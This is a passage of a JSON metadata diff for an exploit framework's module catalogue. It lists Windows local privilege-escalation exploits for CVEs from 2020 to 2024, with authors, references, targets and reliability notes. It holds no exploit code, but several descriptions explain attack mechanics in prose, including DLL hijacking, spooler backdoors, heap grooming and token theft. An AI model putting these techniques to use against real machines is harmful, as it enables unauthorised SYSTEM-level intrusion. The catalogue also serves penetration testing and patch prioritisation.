"session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_0668_service_tracing": { + "name": "Service Tracing Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_0668_service_tracing", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-11", + "type": "exploit", + "author": [ + "itm4n", + "bwatters-r7" + ], + "description": "This module leverages a trusted file overwrite with a DLL hijacking\n vulnerability to gain SYSTEM-level access on vulnerable Windows 10 x64\n targets.", + "references": [ + "CVE-2020-0668", + "URL-https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/", + "URL-https://github.com/itm4n/SysTracingPoc", + "URL-https://github.com/RedCursorSecurityConsulting/CVE-2020-0668", + "PACKETSTORM-156576", + "URL-https://attackerkb.com/assessments/ea5921d4-6046-4a3b-963f-08e8bde1762a", + "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2024-12-12 17:11:53 +0000", + "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_0668_service_tracing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2020_0787_bits_arbitrary_file_move": { + "name": "Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-03-10", + "type": "exploit", + "author": [ + "itm4n", + "gwillcox-r7" + ], + "description": "This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.", + "references": [ + "CVE-2020-0787", + "URL-https://itm4n.github.io/cve-2020-0787-windows-bits-eop/", + "URL-https://github.com/itm4n/BitsArbitraryFileMove", + "URL-https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8", + "URL-https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html", + "URL-https://itm4n.github.io/usodllloader-part1/", + "URL-https://itm4n.github.io/usodllloader-part2/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows DLL Dropper" + ], + "mod_time": "2024-02-07 11:20:12 +0000", + "path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2020_0796_smbghost": { + "name": "SMBv3 Compression Buffer Overflow", + "fullname": "exploit/windows/local/cve_2020_0796_smbghost", + "aliases": [], + "rank": 400, + "disclosure_date": "2020-03-13", + "type": "exploit", + "author": [ + "Daniel García Gutiérrez", + "Manuel Blanco Parajón", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.", + "references": [ + "CVE-2020-0796", + "URL-https://github.com/danigargu/CVE-2020-0796", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1903-1909 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_0796_smbghost.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_0796_smbghost", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "SMBGhost", + "CoronaBlue" + ], + "Stability": [ + "crash-os-restarts" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "RelatedModules": [ + "exploit/windows/smb/cve_2020_0796_smbghost" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1048_printerdemon": { + "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_1048_printerdemon", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-11-04", + "type": "exploit", + "author": [ + "Yarden Shafir", + "Alex Ionescu", + "shubham0d", + "bwatters-r7" + ], + "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. Essentially, on default settings, this module\n adds a permanent elevated backdoor.", + "references": [ + "CVE-2020-1048", + "URL-https://windows-internals.com/printdemon-cve-2020-1048/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1048_printerdemon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1054_drawiconex_lpe": { + "name": "Microsoft Windows DrawIconEx OOB Write Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2020_1054_drawiconex_lpe", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-02-20", + "type": "exploit", + "author": [ + "Netanel Ben-Simon", + "Yoav Alon", + "bee13oy", + "timwr" + ], + "description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n within win32k. The out of bounds write can be used to overwrite the pvbits of a\n SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n This module has been tested against a fully updated Windows 7 x64 SP1. Offsets\n within the exploit code may need to be adjusted to work with other versions of\n Windows.", + "references": [ + "CVE-2020-1054", + "URL-https://cpr-zero.checkpoint.com/vulns/cprid-2153/", + "URL-https://0xeb-bp.com/blog/2020/06/15/cve-2020-1054-analysis.html", + "URL-https://github.com/DreamoneOnly/2020-1054/blob/master/x64_src/main.cpp", + "URL-https://github.com/KaLendsi/CVE-2020-1054/blob/master/CVE-2020-1054/exploit.cpp", + "URL-https://github.com/Iamgublin/CVE-2020-1054/blob/master/ConsoleApplication4.cpp" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1054_drawiconex_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1313_system_orchestrator": { + "name": "Windows Update Orchestrator unchecked ScheduleWork call", + "fullname": "exploit/windows/local/cve_2020_1313_system_orchestrator", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-11-04", + "type": "exploit", + "author": [ + "Imre Rad", + "bwatters-r7" + ], + "description": "This exploit uses access to the UniversalOrchestrator ScheduleWork API call\n which does not verify the caller's token before scheduling a job to be run\n as SYSTEM. You cannot schedule something in a given time, so the payload will\n execute as system sometime in the next 24 hours.", + "references": [ + "CVE-2020-1313", + "URL-https://github.com/irsl/CVE-2020-1313" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1313_system_orchestrator.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1313_system_orchestrator", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_1337_printerdemon": { + "name": "Microsoft Spooler Local Privilege Elevation Vulnerability", + "fullname": "exploit/windows/local/cve_2020_1337_printerdemon", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-11-04", + "type": "exploit", + "author": [ + "Peleg Hadar", + "Tomer Bar", + "404death", + "sailay1996", + "bwatters-r7" + ], + "description": "This exploit leverages a file write vulnerability in the print spooler service\n which will restart if stopped. Because the service cannot be stopped long\n enough to remove the dll, there is no way to remove the dll once\n it is loaded by the service. Essentially, on default settings, this module\n adds a permanent elevated backdoor.", + "references": [ + "CVE-2020-1337", + "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337", + "URL-https://github.com/sailay1996/cve-2020-1337-poc", + "URL-https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_1337_printerdemon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2020_17136": { + "name": "CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP", + "fullname": "exploit/windows/local/cve_2020_17136", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-03-10", + "type": "exploit", + "author": [ + "James Foreshaw", + "Grant Willcox" + ], + "description": "The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.", + "references": [ + "CVE-2020-17136", + "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=2082", + "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows DLL Dropper" + ], + "mod_time": "2024-02-07 11:25:41 +0000", + "path": "/modules/exploits/windows/local/cve_2020_17136.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2020_17136", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2021_21551_dbutil_memmove": { + "name": "Dell DBUtil_2_3.sys IOCTL memmove", + "fullname": "exploit/windows/local/cve_2021_21551_dbutil_memmove", + "aliases": [], + "rank": 400, + "disclosure_date": "2021-05-04", + "type": "exploit", + "author": [ + "Kasif Dekel", + "SentinelLabs", + "Spencer McIntyre" + ], + "description": "The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by\n an attacker read and write kernel-mode memory.", + "references": [ + "CVE-2021-21551", + "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "URL-https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2021_21551_dbutil_memmove", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2021_40449": { + "name": "Win32k NtGdiResetDC Use After Free Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2021_40449", + "aliases": [], + "rank": 400, + "disclosure_date": "2021-10-12", + "type": "exploit", + "author": [ + "IronHusky", + "Costin Raiu", + "Boris Larin", + "Red Raindrop Team of Qi'anxin Threat Intelligence Center", + "KaLendsi", + "ly4k", + "Grant Willcox" + ], + "description": "A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by\n an attacker to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The flaw exists due to the fact\n that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers\n can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object\n that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle\n with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the\n attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the\n kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\\SYSTEM.\n\n This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions\n of Windows 10 will likely also work.", + "references": [ + "CVE-2021-40449", + "URL-https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/", + "URL-https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ", + "URL-https://github.com/KaLendsi/CVE-2021-40449-Exploit", + "URL-https://github.com/ly4k/CallbackHell" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)" + ], + "mod_time": "2024-02-07 11:28:00 +0000", + "path": "/modules/exploits/windows/local/cve_2021_40449.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2021_40449", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2022_21882_win32k": { + "name": "Win32k ConsoleControl Offset Confusion", + "fullname": "exploit/windows/local/cve_2022_21882_win32k", + "aliases": [ + "exploit/windows/local/cve_2021_1732_win32k" + ], + "rank": 200, + "disclosure_date": "2021-02-09", + "type": "exploit", + "author": [ + "BITTER APT", + "JinQuan", + "MaDongZe", + "TuXiaoYi", + "LiHao", + "L4ys", + "KaLendsi", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.", + "references": [ + "CVE-2021-1732", + "URL-https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/", + "URL-https://github.com/KaLendsi/CVE-2021-1732-Exploit", + "URL-https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e", + "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732", + "URL-https://www.fuzzysecurity.com/tutorials/expDev/22.html", + "URL-https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm", + "URL-https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html", + "URL-https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html", + "CVE-2022-21882", + "URL-https://github.com/L4ys/CVE-2022-21882", + "URL-https://github.com/KaLendsi/CVE-2022-21882" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 v1803-21H2 x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2022_21882_win32k.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_21882_win32k", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2022_21999_spoolfool_privesc": { + "name": "CVE-2022-21999 SpoolFool Privesc", + "fullname": "exploit/windows/local/cve_2022_21999_spoolfool_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-02-08", + "type": "exploit", + "author": [ + "Oliver Lyak", + "Shelby Pace" + ], + "description": "The Windows Print Spooler has a privilege escalation vulnerability that\n can be leveraged to achieve code execution as SYSTEM.\n\n The `SpoolDirectory`, a configuration setting that holds the path that\n a printer's spooled jobs are sent to, is writable for all users, and it can\n be configured via `SetPrinterDataEx()` provided the caller has the\n `PRINTER_ACCESS_ADMINISTER` permission. If the `SpoolDirectory` path does not\n exist, it will be created once the print spooler reinitializes.\n\n Calling `SetPrinterDataEx()` with the `CopyFiles\\` registry key will load the\n dll passed in as the `pData` argument, meaning that writing a dll to the `SpoolDirectory`\n location can be loaded by the print spooler.\n\n Using a directory junction and UNC path for the `SpoolDirectory`, the exploit\n writes a payload to `C:\\Windows\\System32\\spool\\drivers\\x64\\4` and loads it\n by calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM.", + "references": [ + "URL-https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81", + "CVE-2022-21999" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Auto" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_21999_spoolfool_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "SpoolFool" + ], + "Stability": [ + "crash-service-restarts" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2022_26904_superprofile": { + "name": "User Profile Arbitrary Junction Creation Local Privilege Elevation", + "fullname": "exploit/windows/local/cve_2022_26904_superprofile", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-03-17", + "type": "exploit", + "author": [ + "KLINIX5", + "Grant Willcox" + ], + "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.", + "references": [ + "CVE-2022-26904", + "URL-https://github.com/rmusser01/SuperProfile", + "URL-https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html", + "URL-https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 11" + ], + "mod_time": "2024-02-07 11:30:42 +0000", + "path": "/modules/exploits/windows/local/cve_2022_26904_superprofile.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_26904_superprofile", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "screen-effects", + "audio-effects" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver": { + "name": "Lenovo Diagnostics Driver IOCTL memmove", + "fullname": "exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver", + "aliases": [], + "rank": 400, + "disclosure_date": "2022-11-09", + "type": "exploit", + "author": [ + "alfarom256", + "jheysel-r7" + ], + "description": "Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to\n issue device IOCTLs to perform arbitrary physical/virtual memory read/write.", + "references": [ + "CVE-2022-3699", + "URL-https://github.com/alfarom256/CVE-2022-3699/" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-11-28 14:35:26 +0000", + "path": "/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2022_3699_lenovo_diagnostics_driver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2023_21768_afd_lpe": { + "name": "Ancillary Function Driver (AFD) for WinSock Elevation of Privilege", + "fullname": "exploit/windows/local/cve_2023_21768_afd_lpe", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-01-10", + "type": "exploit", + "author": [ + "chompie", + "b33f", + "Yarden Shafir", + "Christophe De La Fuente" + ], + "description": "A vulnerability exists in the Windows Ancillary Function Driver for Winsock\n (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is\n possible to create an arbitrary kernel Write-Where primitive, which can be used\n to manipulate internal I/O ring structures and achieve local privilege\n escalation.\n\n This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in\n January 2023 updates).", + "references": [ + "CVE-2023-21768", + "URL-https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768", + "URL-https://github.com/yardenshafir/IoRingReadWritePrimitive" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 11 22H2 x64" + ], + "mod_time": "2023-04-04 09:48:51 +0000", + "path": "/modules/exploits/windows/local/cve_2023_21768_afd_lpe.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2023_21768_afd_lpe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2023_28252_clfs_driver": { + "name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability", + "fullname": "exploit/windows/local/cve_2023_28252_clfs_driver", + "aliases": [], + "rank": 400, + "disclosure_date": "2023-04-11", + "type": "exploit", + "author": [ + "Ricardo Narvaja", + "Esteban.kazimirow", + "jheysel-r7" + ], + "description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n The clfs.sys driver contains a function CreateLogFile that is used to create\n open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which\n contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n The exploits creates a controlled memory space by first looping over the CreatePipe function to\n to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of\n pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n 0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in\n depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).", + "references": [ + "CVE-2023-28252", + "URL-https://github.com/fortra/CVE-2023-28252" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-09-11 13:10:57 +0000", + "path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2023_28252_clfs_driver", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/cve_2024_30085_cloud_files": { + "name": "Windows Cloud File Mini Filer Driver Heap Overflow", + "fullname": "exploit/windows/local/cve_2024_30085_cloud_files", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-12-19", + "type": "exploit", + "author": [ + "Alex Birnberg", + "ssd-disclosure", + "bwatters-r7" + ], + "description": "This module exploits the Windows Cloud Files Mini FIlter Driver cldflt.sys on Windows workstation versions\n 10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.", + "references": [ + "CVE-2024-30085", + "URL-https://attackerkb.com/topics/EHiwxpT2Dp/cve-2024-30085", + "URL-https://ssd-disclosure.com/ssd-advisory-cldflt-heap-based-overflow-pe/", + "URL-https://starlabs.sg/blog/2024/all-i-want-for-christmas-is-a-cve-2024-30085-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2025-01-10 16:14:32 +0000", + "path": "/modules/exploits/windows/local/cve_2024_30085_cloud_files.rb", + "is_install_path": true, + "ref_name": "windows/local/cve_2024_30085_cloud_files", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter", + 